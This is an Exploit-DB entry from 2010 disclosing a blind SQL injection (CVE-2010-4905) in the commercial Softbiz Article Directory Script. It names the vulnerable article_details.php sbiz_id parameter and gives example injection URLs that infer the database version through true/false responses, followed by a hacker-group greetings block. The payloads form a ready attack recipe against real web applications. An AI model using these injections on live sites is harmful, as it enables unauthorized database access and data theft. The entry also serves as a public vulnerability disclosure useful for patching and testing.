Softbiz Article Directory Script sbiz_id Blind SQL Injection Vulnerability

2010-09-05T00:00:00
ID EDB-ID:14910
Type exploitdb
Reporter BorN To K!LL
Modified 2010-09-05T00:00:00

Description

Softbiz Article Directory Script (sbiz_id) Blind SQL Injection Vulnerability. CVE-2010-4905. Webapps exploit for php platform

                                        
                                            ===========================================================
[~] Title: Article Directory (sbiz_id) Blind SQL Injection Vuln
[~] Script: Article Directory
[~] Price: $65
[~] Link: http://www.softbizscripts.com/article-management-script.php
===========================================================
[~] Author: BorN To K!LL - h4ck3r
[~] Contact: SQL@hotmail.co.uk
===========================================================
[~] 3xploit:
/article_details.php?sbiz_id=[Blind-Injection]

[~] Example:
server/article_details.php?sbiz_id=13 and substring(version(),1,1)=4    // False ,,
server/article_details.php?sbiz_id=13 and substring(version(),1,1)=5    // True ,,
===========================================================
[~] Greetings:
bool Greetings = True;
if (Greetings = True)
{
    cout<<"Dr.2"
          <<"Q8 H4x0r"
          <<"Dr.Faustus"
          <<"AsbMay's Group"
          <<"darkc0de team"
          <<"my wife.."
          <<"and all friends \n";
}
else
{
    cout<<"No greeting ..\n";
}
===========================================================